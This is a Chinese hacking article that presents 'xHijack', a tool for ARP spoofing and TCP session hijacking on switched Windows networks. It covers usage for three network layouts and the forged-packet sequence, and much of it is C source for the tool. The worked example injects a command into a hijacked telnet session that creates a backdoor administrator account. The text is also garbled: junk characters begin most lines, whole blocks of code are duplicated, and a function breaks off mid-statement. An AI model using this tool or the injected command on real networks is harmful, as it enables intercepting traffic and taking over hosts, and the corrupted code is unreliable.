再谈交换环境下的会话劫持(For windows2000)

韩冰

第一步是开启IP Routing的功能，修改注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter为0x1，重启系统即可。
第二步是ARP欺骗，具体原理我就不说了。
第三步就是开始劫持啦。
2 W7 I; T/ J0 |! @$ Z& }# q
* ?5 q" o& g1 G% a我写了个程序xHijack可以实现第二、三步功能，使用如下:

! [5 k8 A- `! @Usage: xHijack ServerSide ClientSide

8 U2 r% u$ {( U: r1 w6 Q+ @; c( \下面根据三种不同的情况分别说明如何输入参数：
<1>服务器、客户端、劫持者处于同一局域网，接在同一交换机上（或交换机级连？）。
假如服务器的IP是192.168.0.2，客户端的IP是192.168.0.3，提供如下参数给xHijack即可
c:\>xHijack 192.168.0.2 192.168.0.3
$ S8 ?, y# s1 U" w7 U- |( g劫持前数据流程：server <--> client
劫持后数据流程：server <--> hijacker <--> client

  @7 I! Y. c1 s, |<2>服务器、劫持者处于同一局域网，客户端处于别的网络。
假如服务器IP是202.202.202.2，服务器的网关是202.202.202.1，提供如下参数
xHijack 202.202.202.2 202.202.202.1
2 E8 M0 l$ T$ }: w4 V8 o9 |劫持前数据流程：server <--> gw <--> routes <--> client
# @/ H; i8 w# t& v+ k8 a# O劫持后数据流程：server <--> hijacker <--> gw <--> routes <--> client

* V& S: v$ L' Z4 I<3>客户端、劫持者处于同一局域网，服务器处于别的网络。
2 ?( N* e3 R) H, T5 w9 Q假如客户端的IP是192.168.0.2，网关是192.168.0.1，提供如下参数
4 b: G6 c& p9 B+ u& k/ `xHijack 192.168.0.1 192.168.0.2
3 T9 ^" N: v' }2 D5 t6 {劫持前数据流程：client <--> gw <--> routes <--> server
; q5 B  w/ M, _8 i# O* I$ F+ y* X劫持后数据流程：client <--> hijacker <--> gw <--> routes <--> server

输入两个参数后，会提示你选择网卡，然后会提示
l        <-- List all connections
r x       <-- Reset the number x connection
; s) X, F, `8 u  {# Xw x       <-- Watch the number x connection
6 m# f6 x5 r/ g# K3 oh x command   <-- Hijack the number x connection to execute command

list、reset、watch命令我就不解释了。
8 t+ Y1 S$ e( Y  l假如现在有如下连接
(1) 202.202.202.202:23 <--> 192.168.0.3:2345
4 T" }- Q2 b. {' c; [我们想要劫持这个连接运行我们的命令，输入
xHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add"
( H4 A  ^9 m) K, y/ H为什么命令前面要加&呢？假如客户刚发送一个字符p过去，我们不加&的话，服务器端接受到的就是
pnet user.....了，加了&后就成为p&net user.....，这样就不管前面客户输入了什么，我们的命令
都能够运行了。以上都假设服务器是windows 2000，unix下加什么字符，我不知道，我是unix白痴，呵呵。

* @$ B% K% |" m劫持的流程如下：
<1>伪装成Server给Client发一个rst包
# n" P5 S- N& D; a* K8 T( y% E+ |9 T<2>伪装成Client给Server发了一个数据包
- P' z: w6 Q/ K- C9 m9 }3 ?3 G<3>Server回一个ACK包给client
<4>因为Cleint的连接已经给我们reset掉了，所以client回一个rst包给server
5 g- \2 [5 Q/ _( V6 A) q* U5 {
9 t) H& `0 T- A; C, D2 [% i这样的话，我们只能发一个伪造的包，但我想已经足够了。
1 C9 H: l3 C4 {( u1 y1 s/ W想要一直劫持那个连接也可以，如下
! S8 [3 K6 I% I5 _4 K# |9 w# ?" \( @/ X7 y<1>伪装成Server给Client发一个rst包
<2>欺骗Client，告诉它Server的MAC地址AAAAAAAAAAAA
<3>伪装成Client给Server发了一个数据包
<4>Server回一个ACK包给client
<5>Client回一个rst包给Server，但Server收不到，因为Client发到AAAAAAAAAAAA了，呵呵。
3 x: X/ ~- D) n$ D<6>然后Server发给Client的包都由我们来处理，包括给Server回ACK包等等。

4 U1 z6 o# {) _, q( D不过这样比较危险，在我们劫持的过程中，Client与Server的通讯始终是断开的。

6 ?' a4 A' M7 a7 C3 ^
. }+ R( Q) _: }/ |6 ?0 ]刚开始看TCP/IP协议，调程序调得头昏脑涨，说明也写的乱七八糟，呵呵，程序代码也可能存在很多问题，
还请各位多多指点。
0 ^! I7 ^! Y' M% M; w
4 M4 f- r1 U' w6 Y% \; EBTW:我没有空间，编译好的程序没地方放：（

& h9 H+ y0 z% l4 H) |% d( {

参考资料
<>交换环境下的会话劫持http://www.xfocus.net/article_view.php?id=375
. L& W1 ^# `0 \( |, `: l<>交换网络中的嗅探和ARP欺骗http://www.xfocus.net/article_view.php?id=377
9 E) {* w5 O# U7 N
* F4 U1 U& B& n
3 \1 {, a) f7 B以下是程序代码
' f) J! M) }) U. v9 O----------------------------------------------------------------------
' p. s  N5 R6 a3 N% b: X/*-----------------------------------------------------------------------------
' K5 P5 k# C4 a8 S6 c" v( n3 SFile      : xHijack.c
Version      : 1.0
Create at    : 2002/8/12
Last modifed at  : 2002/8/19
: y8 q$ l* W, Q! i5 n( mAuthor      : eyas
Email      : ey4s@21cn.com
0 d" h4 o0 n  M: s, ~4 E3 p# f1 u0 oHomePage    : www.ey4s.org
感谢refdom和shotgun发布的源代码，使我获益非浅。
If you modify the code, or add more functions, please email me a copy.

备注:
* g4 e  m2 j0 r; c/ v8 A* @<>没有考虑IP头、TCP头超过20字节的情况
<>没有考虑数据包分片的情况
<>没有对截取到的TCP数据进行解码，如TELNET，虽然是明文传输，但是TCP数据里面包含了
( y; P: h2 V) P9 z) I显示格式、位置等信息，直接打印出来，显得很凌乱。但如果是IRC、SMTP、POP3等就没问
题了。
0 I8 K; O5 t" _' r: s8 K
也许下一版本会修正这些问题，也许不会有下一版本了。
. Z7 J/ a, X; `7 _; `* Y; i2 ^
-----------------------------------------------------------------------------*/
#include
, Z( L; }! c5 U% c# o4 O2 Y0 l#include
9 `3 j) R7 i5 o( u#include
#include
' A; E$ @& N) }( T#include
#include
* S4 T& F% t: U4 d( C7 o#include

7 U0 x# D& r  o1 g, @#pragma comment (lib, "packet")
5 D# f! ~" P) U, m( J' |#pragma comment (lib, "iphlpapi")
' _* ]) I9 C7 G2 M#pragma comment (lib, "ws2_32")
5 e* r' A2 S: O+ p  c2 F
; I3 z4 N6 f8 e2 B' ~- {4 S" G" `#define Max_Num_Adapter 10
: J( o- k7 I  s7 H0 n#define Max_Num_IPAddr  5
2 v; ~5 {) ~- b. b3 Y* D/ N#define EPT_IP      0x0800      /* type: IP  */
" R* G9 m- ^& @" {- w$ u2 @#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */
#define EPT_ARP      0x0806      /* type: ARP */

#define  ACTION_NONE    0
0 ^$ _0 ?) L& w. d#define  ACTION_WATCH  1
#define  ACTION_RESET  2
. x* T2 p$ v3 @' X! d#define ACTION_HIJACK  3
; L  E& u6 S. N) T. ^: ^2 x
/*以1字节对齐*/
# i; n% r6 O( g- f0 V, y/ q% x#pragma pack(1)
typedef struct _ehhdr
{
  unsigned char  DestMAC[6];
  unsigned char  SourceMAC[6];
0 |7 }/ N- c: ^& z  W8 r- A+ `  unsigned short  EthernetType;
}EHHDR, *PEHHDR;

9 U" W1 u/ ~! {& Ctypedef struct _iphdr        //定义IP首部
{
  unsigned char h_verlen;      //4位首部长度,4位IP版本号
3 h2 S( V/ G+ O; r" m  unsigned char tos;        //8位服务类型TOS
  unsigned short total_len;    //16位总长度（字节）
  unsigned short ident;      //16位标识
  unsigned short frag_and_flags;  //3位标志位
6 ?5 _3 }, H- D/ k3 Y  f  unsigned char ttl;        //8位生存时间 TTL
  unsigned char proto;      //8位协议 (TCP, UDP 或其他)
4 `6 N' w7 |6 f& \% j  unsigned short checksum;    //16位IP首部校验和
! K* n: L3 ^& f6 y* M, U# `  unsigned int sourceIP;      //32位源IP地址
! @/ P9 y; G8 r2 C  unsigned int destIP;      //32位目的IP地址
}IPHDR, *PIPHDR;
  K# X; v* N2 f
typedef struct _tcphdr        //定义TCP首部
{
  USHORT th_sport;        //16位源端口
- t8 T, Y- Z5 J# i7 A( K- c# e  USHORT th_dport;        //16位目的端口
  unsigned int th_seq;      //32位序列号
! L6 n1 Q5 D; ]  unsigned int th_ack;      //32位确认号
$ ^- G- M: ^3 T0 E% F  unsigned char th_lenres;    //4位首部长度/6位保留字
  unsigned char th_flag;      //6位标志位
$ u& ?! E/ k* ]  USHORT th_win;          //16位窗口大小
" T# ?, @, B. Q4 C7 K3 l  USHORT th_sum;          //16位校验和
  USHORT th_urp;          //16位紧急数据偏移量
3 \3 M$ }9 u. |6 [' }# i- N}TCPHDR, *PTCPHDR;

typedef struct _psdhdr        //定义TCP pseudo header
+ g! O* U" s+ O" X6 W* }8 `{               
  unsigned long saddr;
$ ^2 z0 O, @0 _& k  O$ u  unsigned long daddr;
) G* ~+ s4 z- N2 }, {) O$ Q  char mbz;
& W4 O. u# P, U& m" d  F3 B  char ptcl;
- \( G( N8 t+ A! E& \9 K9 |* Y$ c6 C  unsigned short tcpl;
6 f7 X5 W7 `% \8 q}PSDHDR, *PPSDHDR;

typedef struct _arphdr
5 e' Z7 z, w9 a' k& @$ U: E  o; q{
" u7 j3 i# L. h: d7 e  unsigned short  HrdType;//硬件类型
) B* S+ k( s: @4 x6 D# G  unsigned short  ProType;//协议类型
% s0 c" m/ @2 F/ J, D7 W& \& W  unsigned char  HrdAddrlen;//硬件地址长度
8 q$ b) D( o) o2 L  unsigned char  ProAddrLen;//协议地址长度
: M* g5 J& ?  y2 B+ m5 F  unsigned short  op;//operation
  unsigned char  SourceMAC[6];/* sender hardware address */
, X  L5 J+ w+ c  unsigned long  SourceIP;/* sender protocol address */
  unsigned char  DestMAC[6];/* target hardware address */
  unsigned long  DestIP;/* target protocol address */
}ARPHDR, *PARPHDR;

5 S; J+ }+ k2 T9 Wtypedef struct _ArpPacket
) e2 j$ L& M2 p0 g' X& ~{
& h5 j, S4 _! r$ ~6 ]" ?& H9 V  EHHDR  ehhdr;
  ARPHDR  arphdr;
}ARPPACKET, *PARPPACKET;
* T8 a& f+ s4 i( |% {& e3 `4 c/ i
typedef struct _tcppacket
  l& t/ s3 S" r2 `{
& ~* H0 c/ d" L  EHHDR  ehhdr;
  IPHDR  iphdr;
. j3 }1 e- M3 \& C& g3 L* c7 q. Y  TCPHDR  tcphdr;
4 @8 f+ O5 S/ u8 g7 E}TCPPACKET, *PTCPPACKET;
* H. b( P; g( v1 {  H- Y& _
typedef struct _conninfo
9 R1 f" y% E* Y{
  DWORD  dwServerIP;
  USHORT  uServerPort;
4 C8 |6 ^% W( N! o2 }9 Z  DWORD  dwClientIP;
6 o: L4 L- ^9 l0 P& v  USHORT  uClientPort;
' p* S) z/ p: y2 r. `  DWORD  ident;//标识
, T( S1 g8 T6 e9 B0 ~  BOOL  bActive;
  struct  _conninfo  *Next;
}CONNINFO, *PCONNINFO;
/ C* x, ?1 q  H- b, H
* b, x2 ]( S0 c/ c' s//定义全局变量

韩冰

unsigned int  g_ServerSideIP,
        g_ClientSideIP,
        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
+ R8 P! F# L9 h7 k: T; J1 ~        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
6 Y* ?6 V( B- }2 S; B4 |unsigned char  g_szClientSideMAC[6];
4 R6 k: Q# z& ]/ T. E9 v8 z3 vunsigned char  g_szServerSideMAC[6];
1 K1 X8 a& e4 w8 ]! mchar      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
3 C1 n0 T& Z& G: u0 Jchar      g_szCommand[128];//command to execute after hijack
8 K4 L% [$ A- EDWORD      g_dwAction;//action type
; m# @9 f, a3 }% i) F/ N: ^  FDWORD      g_dwCtrlConn;//action 所控制连接的标识
- `. X/ V3 b% ADWORD      g_ident;//节点标识，递增
PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
: c# c2 H' W- n7 n# M, b; J        g_pConnHead = NULL,
        g_pConnLast = NULL;
, A; J# E- j. O3 X5 ?char      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
//函数
; l8 l! |( |0 w5 f8 |+ D7 H) _( Pvoid      usage(void);
void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
# ]$ L' k9 P. G/ J1 evoid      ListAllConnection();//列出当前所有的连接
  x3 A* [7 ~$ [% p* Nvoid      ResetActionAllFlag();
5 x+ s+ Q' x  H* [3 e; kUSHORT      checksum(USHORT *, int);
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
% h+ X0 O9 A7 _0 f( C- aBOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
LPADAPTER    InitAdapter();//初始化一些参数和全局变量
$ W' f+ |  S( p$ k0 i- f! LBOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
DWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
$ Y6 m, N" t" LDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
' c) v% v' D. p/ F9 MDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
* M! l0 Y- r+ K) FDWORD  WINAPI  InterfaceThread(LPVOID);//
7 A; @, G. T) B% x+ a2 aBOOL  WINAPI  CtrlEvent(DWORD);


8 C" H' `: H8 d+ f' v) m
int main(int argc, char **argv)
{
3 O! G: n, @6 l9 D# o" W/ X  struct    bpf_stat stat;
  int      i;
2 Y6 \; z( x1 ^+ X9 q1 M0 R
0 s5 [$ K, R2 k7 `2 e1 W9 N0 Q6 L- X  usage();
  if (argc != 3) return 0;
5 ?  `$ F' @" G% X6 V/ @  //取得参数
3 Q- a! j: _  ?7 F& X0 a7 F: J  g_ServerSideIP = inet_addr(argv[1]);
' @5 T7 n; A+ q. w& v  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
  g_lpAdapter = InitAdapter();
9 U: C. |9 w' _& m6 Y  if(!g_lpAdapter) return 0;
$ y0 b. d1 F4 x! z- Q$ K  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
9 J  r# k9 l2 `% h  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
& w9 w" i: u  n- x8 }  //create arp spoof thread     
1 u: D& G2 p0 ^4 n  R6 W% k) g0 U( \  i = 1;
  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
) i" @! x/ u3 A1 z- \  Sleep(500);
  ~/ p$ A+ ]1 ?) ^% g1 o) f$ t  i = 2;
* O0 F5 R, c- V4 l" _  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  //create analyse packet thread
9 w* f6 B5 b+ m( E/ a  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
( d1 {: M$ `( e% C: ~! a  //create interface thread
  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
# W7 V% C& o) B# n( O  //set console ctrl handle
( L( G, A3 m2 ]/ ^. @* t  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
' I+ h/ V, k1 s+ l' i    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
3 h  k) n# Q9 ?3 G# m9 T    return 0;
* B. K. B9 Y' A7 j, o  }
  //wait for any thread exit
" u) u1 a# D8 I; M8 n! q  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
3 c/ a( s( p, u2 C8 F- y8 b+ `  //print the capture statistics
& U5 i/ @1 U2 L4 ]: i% p  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
    printf("Warning: unable to get stats from the kernel!\n");
  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
  PacketFreePacket(g_lpSendPacket);
4 n4 }% S$ Y: X( Z* G4 Z. U  PacketCloseAdapter(g_lpAdapter);
3 M' U# b: Y. Q  return 0;
* u- o( X8 \" h0 z% R2 w}

6 o3 T* _" c. W1 {' t. Y5 O* x//
//功能：重置所有于ACTION有关的标志
//

韩冰

unsigned int  g_ServerSideIP,
7 j$ Q3 |) g0 a6 w        g_ClientSideIP,
        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
. U# z# u7 D8 |0 J, l0 C        g_TotalIP = 0;//
6 p8 _# Y9 }! P" D0 Z6 Cunsigned char  g_szOwnMAC[6];//本机MAC地址
unsigned char  g_szClientSideMAC[6];
" y1 d) Y! S. J; J9 t  D! j; g% hunsigned char  g_szServerSideMAC[6];
+ F! W6 r% Y# ^# }char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
+ T, l, d2 A7 g: R" gLPADAPTER    g_lpAdapter;
6 K; i/ x3 O# _- y3 f//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
) `2 ]) N$ \( U; ZHANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
4 ~  [' U( e' H; m2 q6 b2 A1 y- _+ iDWORD      g_dwCtrlConn;//action 所控制连接的标识
" W0 o( K3 L: Z. FDWORD      g_ident;//节点标识，递增
# x! V- v- p/ L+ ^PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
4 O; k- Q# O6 [, g! p$ e' r        g_pConnHead = NULL,
        g_pConnLast = NULL;
char      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
1 u+ ^2 ~) ?, V/ ?, k4 z8 w% q$ D//函数
void      usage(void);
: D7 n- m/ A+ }9 E! |4 I6 [& _void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
8 d& e) R. ?3 C3 U  F: S- w. evoid      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
  _- J& t$ v$ K3 e) s8 z0 jUSHORT      checksum(USHORT *, int);
4 F. p2 e+ Y" l. ?" b2 m  nBOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
: q( u7 W/ ?# yBOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
; t. k/ E/ K7 ?$ Q* OLPADAPTER    InitAdapter();//初始化一些参数和全局变量
BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
! ~# q4 }- `7 H$ lDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
9 F. M6 t$ o& TDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
' u5 S3 b$ r) N! N" n+ n/ XDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
& m9 E4 q/ M. l) XBOOL  WINAPI  CtrlEvent(DWORD);



int main(int argc, char **argv)
7 k6 }7 E2 ~! t6 Y3 z' E{
$ c& r$ M7 t% p% k! W3 p  struct    bpf_stat stat;
/ |6 A5 V8 D' Z- y  int      i;

, B  w$ i. X. J! U$ O  usage();
4 }# A* ?4 B$ L7 _$ T6 G' i( c  if (argc != 3) return 0;
  //取得参数
) f0 {- }6 o; _+ a  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
* Z+ W( z( Z) t* V+ H  //初始化adapter & 一些全局变量
  g_lpAdapter = InitAdapter();
, A0 m* w, S5 K4 }0 c6 V  if(!g_lpAdapter) return 0;
! \" g: I& P3 Q3 [; o# S  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
; t/ @7 V  b. `- q+ e  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
, v, V( R. J  t& k) f. V  //create arp spoof thread     
  i = 1;
% X0 T( H  T# S' ?; [  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
2 t3 V! @+ F7 {. G! z  Sleep(500);
1 O9 H2 H7 a, K6 Q- y0 a1 b* Q  i = 2;
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
4 c& q% O% j; w: K" A  @& t  t8 u  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
8 |. r2 n( B4 i& @) q+ E( ?  //create interface thread
  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
  d0 |! A+ J' t/ @  //set console ctrl handle
/ |$ A5 q/ s7 q2 Y  A  J  C$ s: x8 v  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
    return 0;
  }
  //wait for any thread exit
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
+ w! o" c. t; V- J1 ?: r  \  //print the capture statistics
, j, J: @8 F3 \0 X0 v/ I( ?  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
    printf("Warning: unable to get stats from the kernel!\n");
! Z+ Q) O) e  P% [% Y: F. y  else
; _; y8 v$ m" z6 N' ]    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
1 {' J5 N  C  J* G  E( \+ D! y  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
3 ?7 I- z+ W2 w* d  return 0;
" e# S( J$ P1 }7 [) R1 \4 G}

9 f; d8 {. z- ?" q# [# W7 b//
//功能：重置所有于ACTION有关的标志
. z$ Z2 x+ L$ g8 e- ?7 C/ ]//

韩冰

void ResetActionAllFlag()
{
  g_dwCtrlConn = 0;
  g_pCurrCtrlConn = NULL;
  g_dwAction = ACTION_NONE;
# t, T7 `7 K+ R}

//
//功能：处理Ctrl+C和Ctrl+Break事件
% ~; d/ z; M$ n6 ]" e: M//
BOOL WINAPI CtrlEvent(DWORD dwCtrlType)
7 k+ u6 w% G8 n4 N! x+ c{
. A$ W# M6 q- G# {8 ^( W  switch(dwCtrlType)
  {
    case CTRL_BREAK_EVENT:
      //reset action all flag
. J0 }& c5 @! e1 O5 k" d      ResetActionAllFlag();
2 Y6 c& B$ M% s& T8 L      break;
  t& U" _2 ]- |9 d* z2 {    case CTRL_C_EVENT:
      //terminate all thread
5 ^0 _3 p8 G& P: M  [      TerminateThread(g_hThread[0], 0);
      TerminateThread(g_hThread[1], 0);
      TerminateThread(g_hThread[2], 0);
: C" J. m, P5 k# R5 |      TerminateThread(g_hThread[3], 0);
7 f4 q/ i7 d; n! ~$ I1 O" |      break;
    default:
      break;
  }
* X3 V% T; d) \  return TRUE;
7 r5 T% s/ U6 T$ _3 |}
2 p$ P( T4 R* j+ y3 ?' G
//
//功能：处理用户输入
//
DWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos)
* i1 q+ l/ ~# t. P{
  DWORD  i;
  char  szBuff[16];
- ^& Z  |# a: {, R; y
5 H' p: ^7 R1 \3 W& T* w  X( {  *lpCommandPos = 0;
  for(i=0; i<15, i代码比较乱
//
DWORD WINAPI InterfaceThread(LPVOID lp)
{
- L8 W; p* M+ _8 j3 z) I3 s/ R8 B  char  szHelp[] =  "l\t\t<-- List all connections\n"
8 l0 u) }2 |& ~+ p# t" ^4 K' b9 m            "r x\t\t<-- Reset the number x connection\n"
            "w x\t\t<-- Watch the number x connection\n"
: B1 n5 N' i0 X  [            "h x command\t<-- Hijack the number x connection to execute command\n"
# ]9 n: ~* j+ ]  O1 _1 c1 U            "[Note]\n"
            "Ctrl+Break to clear all action\n"
            "Ctrl+C to exit\n";
  char  szPrompt[] = "\nxHijack>";
  char  szBuffer[128];
  DWORD  dwPos;
  ^2 x9 f2 @/ v- S* s. l" e- \* t  PCONNINFO  pTmp;
, i8 g2 ?- A4 s5 ]* N2 I# _. E4 y8 R
  while(1)
' k" o* s8 [6 ~9 P  {
    gets(szBuffer);//不考虑buffer overflow
    switch(szBuffer[0])
. }' q0 |! P, b/ \# ~0 f8 `    {
      case 'l':
      case 'L':
        ListAllConnection();
        break;
      case 'r':
      case 'R':
0 N8 ~+ [0 x4 t) }5 |  k2 L! X        if(strlen(szBuffer) >2)
- w+ B$ T# P% B5 B; m        {
' v) O8 U' c" X% q- k          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
( v0 c! K+ j9 K          g_dwAction = ACTION_RESET;
        }
, W0 C/ L5 S, y        else printf("%s", szHelp);
        break;
      case 'w':
      case 'W':
        if(strlen(szBuffer) > 2)
        {
2 L1 x$ X+ P+ q1 g0 q  w3 ]          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_WATCH;
7 H5 r2 s) Y7 p8 H        }
        else printf("%s", szHelp);
& P5 {  N0 y) g. X$ V. A: S+ w        break;
      case 'h':
      case 'H'://h 1 xxx
        if(strlen(szBuffer) > 5)
        {
  |6 [4 b, E- H( e. u1 k          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          //如果command第一个字符是'或"
          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') )
/ L' {: i8 ?) L! ?2 \9 y          {
# @+ W5 d* n( g  U1 H            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3);
! e) s5 o& v6 ~) a) h            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//去掉最后一个'或"
0 Z" G1 |$ V* o& |" O6 P          }
          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3);
1 F9 W# c& s$ h/ G6 ]- t  Z          strcat(g_szCommand, "\x0D\x0A");
' U' F6 Y1 l; e% C' z          g_dwAction = ACTION_HIJACK;
        }
        else printf("%s", szHelp);
7 I% |0 A; @* H2 E+ q( q8 A# X  g        break;
      default:
; v3 w- V2 F  H! V        printf("%s", szHelp);
        break;
    }//end of switch
! @$ v  g, T  [6 q& C6 W    //find the specify ident's struct point
4 }- D( |, d) Y, z    if( (g_dwCtrlConn) && (g_dwAction) )
  }3 p. P# y$ c9 S7 [0 \    {
" \; T5 _/ u( U/ D0 B5 V      g_pCurrCtrlConn = NULL;
      pTmp = g_pConnHead;
4 u0 Y% X6 Z1 T* t8 [      while(pTmp)
2 T) J- g( h, u* O7 ~) j4 w$ r      {
        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) )
        {
3 }' Q. N8 |( [: F  ?; l          g_pCurrCtrlConn = pTmp;
2 P/ Z8 K) X7 ^$ w% O          break;
        }
0 u8 f" P- ^* k, V7 _- \        pTmp = pTmp->Next;
" f+ y4 r/ W7 R7 A* x. b      }
8 p) P% ?* a2 V$ p3 s# c/ f* X      if(!g_pCurrCtrlConn)
      {
        printf("Can't find the number %d connection.\n", g_dwCtrlConn);
7 h+ w/ o/ w6 l; Q% m! D: P9 o        //reset action all flag
        ResetActionAllFlag();      
      }
8 M+ E9 B1 @& a* f! f6 L    }
    if(!g_dwCtrlConn) ResetActionAllFlag();
    //显示当前用户所期望的动作
/ o- y$ }; o+ I; |5 {    printf("\nCurrentAction:");
9 l8 x1 d) |& P1 G4 z7 x    switch(g_dwAction)
    {
* y0 F' u3 r. V, ]      case ACTION_WATCH:
        printf("ACTION_WATCH");
        break;
2 k: F  [" @; i" L      case ACTION_RESET:
7 Q) \# h$ l& C* g+ R        printf("ACTION_RESET");
1 G( t. K$ e2 k        break;
      case ACTION_HIJACK:
        printf("ACTION_HIJACK");
        break;
" Y' n7 U9 n3 U  c  x; y      default:
        printf("ACTION_NONE");
        break;
    }
    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt);
5 q4 w2 q! f) b0 J  }//enf of while
  return 0;
}

韩冰

// + X) |6 E8 r) V# N" }7 K! t1 w//功能：列出当前所有连接 // void ListAllConnection() * O6 M3 h5 c9 W$ ~{ : T5 c: Y! e+ l$ f1 d PCONNINFO pTmp; ; J% Y. k' P$ }& O8 f$ I5 O SOCKADDR_IN saDest, saSource; pTmp = g_pConnHead; # }* W+ B' P# K7 h/ B3 i5 ] while(pTmp) { if(pTmp->bActive) { 2 U7 k* E7 c2 N2 E [& | saSource.sin_addr.s_addr = pTmp->dwServerIP; ( ~( `3 ]* t1 O* ~8 n9 c$ |1 F saDest.sin_addr.s_addr = pTmp->dwClientIP; printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr), ntohs(pTmp->uServerPort)); + {3 ~! d0 w6 M4 z! A' z printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort)); } 6 ^1 \5 y& y7 N6 ?: r: z pTmp = pTmp->Next; } } . ]5 B. G. C/ r& @4 _ 2 r- q* b) s8 G4 \) j// //功能：初始化一些数据，取得指定网卡的MAC地址和所有IP地址 : @& f7 c3 e) L; c// # a' o7 v* h6 x2 \0 ^$ m9 hLPADAPTER InitAdapter() ' V6 J4 Q/ R' a0 M2 t+ C{ LPADAPTER lpAdapter; static char AdapterList[Max_Num_Adapter][1024]; char szSelectAdapterName[512]; 9 b- Y7 D. c' b+ |: p& H r WCHAR AdapterName[2048]; 3 ~6 F; X( S* }! x5 ~# m5 h Z WCHAR *temp,*temp1; ULONG AdapterLength = 1024; int iAdapterNum = 0; int iRetCode, i; int iAdapter = 0; ULONG ulLen = 0; * m( u3 g, y' K* ]2 m" e DWORD dwRet; 8 q) F C4 t3 q' i5 `( H PIP_ADAPTER_INFO pAdapterInfo = NULL, pTmp; 